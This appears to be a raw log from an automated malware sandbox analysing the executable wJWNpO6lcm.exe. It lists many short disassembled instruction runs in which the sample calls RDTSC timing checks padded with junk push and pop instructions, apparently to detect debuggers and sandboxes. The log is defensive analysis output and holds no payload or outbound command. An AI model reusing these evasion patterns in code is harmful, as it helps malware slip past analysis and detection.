Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB1C4A second address: EB1C57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F2F08CCF066h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB1C57 second address: EB1C7D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 je 00007F2F08D1BEA6h 0x00000009 pop esi 0x0000000a pushad 0x0000000b jnc 00007F2F08D1BEA6h 0x00000011 jmp 00007F2F08D1BEB3h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB1F2A second address: EB1F34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2F08CCF066h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB1F34 second address: EB1F39 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB21C8 second address: EB21E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2F08CCF06Fh 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pushad 0x0000000c ja 00007F2F08CCF066h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB21E6 second address: EB21FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ebx 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop ebx 0x0000000e pushad 0x0000000f jng 00007F2F08D1BEA6h 0x00000015 push ebx 0x00000016 pop ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB21FF second address: EB221E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2F08CCF075h 0x0000000a push eax 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB6E76 second address: EB6E7B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB5F31 second address: EB5F37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB6091 second address: EB6099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB6099 second address: EB60A7 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2F08CCF066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB60A7 second address: EB60AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB60AB second address: EB60CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08CCF075h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB60CF second address: EB60DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jns 00007F2F08D1BEAAh 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB67FA second address: EB6856 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2F08CCF066h 0x00000008 jmp 00007F2F08CCF077h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007F2F08CCF06Fh 0x00000014 pushad 0x00000015 push edi 0x00000016 jp 00007F2F08CCF066h 0x0000001c push ebx 0x0000001d pop ebx 0x0000001e pop edi 0x0000001f jg 00007F2F08CCF077h 0x00000025 jbe 00007F2F08CCF06Eh 0x0000002b pushad 0x0000002c popad 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB6856 second address: EB685D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB69B4 second address: EB69C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB69C7 second address: EB69E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2F08D1BEB2h 0x00000008 pushad 0x00000009 popad 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB6B67 second address: EB6B6B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EB6B6B second address: EB6B88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08D1BEADh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f ja 00007F2F08D1BEA6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC1D39 second address: EC1D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC1E96 second address: EC1E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC1E9A second address: EC1EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC1EA0 second address: EC1EA5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC1EA5 second address: EC1EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC1EAB second address: EC1EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC21BF second address: EC21E0 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F2F08CCF066h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F2F08CCF071h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC2341 second address: EC2347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC24AD second address: EC24D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08CCF06Bh 0x00000009 push esi 0x0000000a pop esi 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007F2F08CCF066h 0x00000014 jmp 00007F2F08CCF071h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC2616 second address: EC261A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC261A second address: EC2620 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC8689 second address: EC86A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08D1BEB6h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC86A3 second address: EC86AD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F2F08CCF066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EC86AD second address: EC86B8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 js 00007F2F08D1BEA6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: ECB37A second address: ECB387 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jnc 00007F2F08CCF066h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: ECB387 second address: ECB3A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2F08D1BEADh 0x00000008 jmp 00007F2F08D1BEACh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: ECB3A5 second address: ECB3EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jp 00007F2F08CCF066h 0x0000000e jmp 00007F2F08CCF075h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b jnc 00007F2F08CCF066h 0x00000021 jmp 00007F2F08CCF072h 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: ECB3EA second address: ECB3FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F2F08D1BEACh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: ECB57C second address: ECB582 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: ECB710 second address: ECB714 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: ECB714 second address: ECB71A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EDAAE2 second address: EDAAEC instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2F08D1BEA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EDCAA0 second address: EDCAB8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jc 00007F2F08CCF066h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jbe 00007F2F08CCF066h 0x00000015 pushad 0x00000016 popad 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EDCAB8 second address: EDCABD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EDC5E4 second address: EDC5F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08CCF06Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EDC5F5 second address: EDC622 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEACh 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2F08D1BEB8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EDC767 second address: EDC775 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F2F08CCF066h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EDC775 second address: EDC795 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F2F08D1BEB0h 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EDC795 second address: EDC79B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EDEFA7 second address: EDEFB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F2F08D1BEA6h 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EDF113 second address: EDF118 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EE2FF5 second address: EE3032 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F2F08D1BEB8h 0x0000000b popad 0x0000000c jmp 00007F2F08D1BEB9h 0x00000011 pushad 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EE3032 second address: EE3038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EE3038 second address: EE303E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EE799A second address: EE79A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 jnc 00007F2F08CCF066h 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EE79A6 second address: EE79B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08D1BEADh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EF9F7B second address: EF9FA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF074h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F2F08CCF071h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EF9FA6 second address: EF9FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFA108 second address: EFA11A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2F08CCF06Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFA11A second address: EFA11E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFA11E second address: EFA124 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFA124 second address: EFA12B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFA4EC second address: EFA4F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFA4F0 second address: EFA4F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFA4F6 second address: EFA4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFA4FC second address: EFA506 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F2F08D1BEA6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFA506 second address: EFA521 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F2F08CCF066h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2F08CCF06Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFA699 second address: EFA69E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFA69E second address: EFA6A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFA6A4 second address: EFA6AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFB067 second address: EFB072 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFB072 second address: EFB076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFB076 second address: EFB089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: EFCA91 second address: EFCA9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F03293 second address: F03297 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F03297 second address: F032A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jbe 00007F2F08D1BEA8h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F22853 second address: F22857 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F22857 second address: F2285D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F38ABE second address: F38AC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F38D3A second address: F38D4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jp 00007F2F08D1BEA6h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F393C7 second address: F393E0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2F08CCF073h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F393E0 second address: F393E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F393E8 second address: F393EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F393EC second address: F393F6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2F08D1BEA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F39566 second address: F39587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 ja 00007F2F08CCF079h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F39700 second address: F39709 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F39709 second address: F3972A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jp 00007F2F08CCF066h 0x00000011 jmp 00007F2F08CCF070h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F3972A second address: F39734 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F2F08D1BEA6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F3C818 second address: F3C81E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F3C903 second address: F3C909 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F3CB30 second address: F3CB4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2F08CCF06Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007F2F08CCF066h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F3CB4E second address: F3CB58 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F2F08D1BEA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F3CB58 second address: F3CB62 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F2F08CCF06Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F3F519 second address: F3F52D instructions: 0x00000000 rdtsc 0x00000002 jno 00007F2F08D1BEACh 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\wJWNpO6lcm.exe	RDTSC instruction interceptor: First address: F3F52D second address: F3F531 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
